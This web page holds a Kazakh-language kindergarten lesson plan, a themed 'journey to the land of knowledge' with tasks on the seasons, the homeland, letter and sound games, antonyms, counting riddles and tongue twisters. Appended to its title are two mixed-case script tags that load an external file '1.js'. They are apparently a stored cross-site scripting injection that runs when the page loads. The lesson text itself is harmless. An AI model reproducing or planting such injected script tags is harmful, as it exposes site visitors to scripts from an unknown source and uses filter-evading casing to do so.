«Білім еліне саяхат»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

29.05.2019

Жоғары санатты тәрбиеші: О.Ж. Шуақпаева       

Мақсаты:

Білімділік:Балалардың білім деңгейін кеңейте түсу, сөйлеуге, ойын толық айта білуге үйрету;

 Дамытушылық:ойлау, есте сақтау, тіл байлығын дамыту;

Тәрбиелілік:мақсатына жетуге ұмтылдыру, тапқырлыққа, өздігінен жұмыс істей білуге тәрбиелеу.

Алдын-ала жүргізілетін жұмыстар:өтілетін материалдарды қайталатып жинақтау.

Көрнекіліктер: Жыл мезгіліне байланысты суреттер, үй жануарлары, жабайы аңдар, өсімдіктер, жәндіктер, жеміс пен көкөніс муляждары,аңдар, әріптер.

Әдіс-тәсілдер: сұрақ-жауап,ойын, ізденіс, ынталандыру.

Балалар үлкендермен амандасады.

Балалар шеңбер бойына  тұрады.

Жарқын, жарқын үніміз,

Болашақтың күніміз.

Балалалық шақ үйінің,

Жайнап тұрған гүліміз,

Сәлеметсіздер ме, қонақтар,

Қош келдіңіз бәріңіз!

-Балалар бүгінгі көңіл-күйлерің қандай?

Балалар, бүгін біз сендермен білім еліне саяхатқа барамыз.

-Саяхатқа қандай көлікпен баруға болады?

Балалардың жауабы.

Автобус, машина, пойыз, ұшақ, тікұшақ, т.б. балалардың жауабы.

-Біз бүгін саяхатқа ұшақпен барамыз. Қане, бәріміз қанаттарымызды жайып ұшақ болайық. Ал, қанекей аттандық, сендерге сәттілік тілеймін!

Балалар қолдарын жан-жаққа созып қимыл жасайды.

-Балалар, білім еліндегі бірінші аялдамаға тоқтайық, мында сендерге мынадай тапсырма орындау қажет.   

1-тапсырма

-Бір жылда неше жыл мезгілі бар?

-  Төрт жыл мезгілі бар.

-Қазір қандай жыл мезгілі?

-Көктем мезгілі

-Жыл мезгілдердеріне сипаттама жасау.

-Өте жақсы, бұл тапсырманы жақсы орындадыңдар, келесі аялдамаға барайық.                                                2-тапсырма

«Отан-қуат, Отбасы-шуақ» демекші келесі аялдамадағы тапсырма Отан туралы болмақ.

-Біздің Отанымыз қалай аталады?

-Қазақстан Республикасы.

-Қазақстан қандай мемелекет?

-Көп ұлтты мемлекет.

-Елімізде қандай рәміздер бар, олар туралы кім айтып береді?

- Әнұран, елтаңба, ту.

-Еліміздің бас қаласы қай қала?

-Нұр-сұлтан  қаласы.

-Отан жайлы білетін тақпақтарың болса айтыңдар.

Балалар Отан туралы білетін тақпақтарын айтады.

Отан - сөзін буынға бөлейік, дыбыстық талдау жасайық.

3-тапсырма

 «Сөзді бұз» ойынын ойнаймыз. Мен сөз айтып тұрамын, ал сендер сол сөздің бірінші әрпін ш-дыбысына ауыстырасыңдар сонда басқа сөз шығады.

Ай- шай

Ақыру- шақыру

Аңқылдақ – шаңқылдақ

Ар – шар

Айқас- шайқас

Ағатай – шағатай

Шар деген сөзге сөйлем құрайық.

4-тапсырма

«Білім иығына салмақ салмайды» демекші біз білімімізді жан-жақты көрсетуіміз қажет. Қарама-қарсы сөздерді таба біл.                              

Ақ- Қара                                                                              Биік- аласа                                                                         Үлкен - кішкентай                                                             Тәтті-ащы                                                                        Ұзын- қысқа                                                                       Семіз -арық                                                                          Жуан-жіңішке                                                                    Жұмсақ-қатты                                                                        Жақсы- Жаман

 

- «Жақсы» деген сөзді талдайық. Неше дыбыс бар?

- бес дыбыс бар, екі дауысты дыбыс, үш дауыссыз дыбыс.

Бірінші дыбыс қандай дыбысқа жатады?

-Міне, балалар, математика еліне де жеттік, мында мен сендерге арналған тапсырмалар беремін.

5-тапсырма

-Сандарды ретімен қойып тура және кері санау.

Балалар сандарды ретімен қойып тура және кері санайды.

Ойын: «Көршісін тап»

6-тапсырма

«Ойна да, ойлан» тақырыбына біздер ауызша есептер шығарып көрейік.

Табақта 3 алма

Қолымда 2 алма

Қосқанда барлығын

Болады неше алма?

Тал бойында тізіліп,

Бес жапырақ тұр еді.

Жел соқты да, үзіліп,

Ұшып кетті екеуі,

Неше жапырақ ілініп тұр?

Алма ағашында 5 алма

Қандай тәтті жесе алма,

Бесеуінде жеп қойсаң,

Қалады неше алма?

Балалар ауызша есепті ойлап шешеді.

Сергіту сәті

7- тапсырма

Ойын: «Ойлан, тап»

Кім  сипаттама жасайды?

8– тапсырма: «Аңдар туралы видео» көру. 

Тіл ұстарту жаттығулары:

Ян- ян - ян жүгіріп жүр қоян,

Ыр- ыр –ыр ырылдайды қасқыр,

Кі –кі – кі бұлаңдайды түлкі,

Ю- ю – ю қорбаңдайды аю.

 

Ойын: «Не артық?»

-Алма, алмұрт, кәмпит, банан.

-1, 2, 3, 4, торт.

 Ойын: «Бір сөзбен айт»

 

 9-тапсырма: Балалармен жеке жұмыс.Қағаздан гүл істеу.

Сабағымызды ән: «Балабақшамен» аяқтаймыз.

 

Балалар,биыл сендер көп нәрсе оқып, үйрендіңдер.Өзіміздің  қуанышты көңілімізді қонақтарға сыйлайық.

 

 

 

 

 

 

 

 

 

 

 

 

          .

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Просмотров: 984


Пікір қосу



Деректерді қолтаңбаға қосу